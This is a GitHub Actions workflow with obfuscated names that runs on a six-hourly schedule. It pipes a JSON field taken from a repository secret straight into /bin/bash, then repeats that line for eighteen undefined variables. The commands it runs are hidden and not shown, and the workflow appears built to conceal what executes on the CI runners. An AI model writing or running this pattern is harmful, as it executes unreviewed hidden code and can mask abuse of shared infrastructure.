name: hongyanshui3109
on:
  workflow_dispatch:
  schedule:
    - cron: '44 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: hongyanshui3109
        env:
          nkprd803: ${{ secrets.nkprd803 }}
        run: |
          echo $nkprd803 | jq -r .hroda52 | /bin/bash
          echo $dj7345 | jq -r .va10228 | /bin/bash
          echo $vigv244 | jq -r .tgxz4862 | /bin/bash
          echo $tjtra04 | jq -r .qqecj59 | /bin/bash
          echo $luu29 | jq -r .miiey3 | /bin/bash
          echo $ls189 | jq -r .onax889 | /bin/bash
          echo $ap4690 | jq -r .ei11516 | /bin/bash
          echo $rylmb445 | jq -r .izvz6370 | /bin/bash
          echo $hkn3511 | jq -r .rgl87 | /bin/bash
          echo $dq971 | jq -r .wimc24522 | /bin/bash
          echo $rxz071 | jq -r .z91 | /bin/bash
          echo $lxcxl30234 | jq -r .fyty900 | /bin/bash
          echo $dsd14163 | jq -r .bvm70 | /bin/bash
          echo $jcr0574 | jq -r .m199 | /bin/bash
          echo $bwksa6 | jq -r .yciix42 | /bin/bash
          echo $z75158 | jq -r .iy972 | /bin/bash
          echo $z1381 | jq -r .l0 | /bin/bash
          echo $oaes04538 | jq -r .hclam957 | /bin/bash
          echo $qvnx35 | jq -r .b070 | /bin/bash

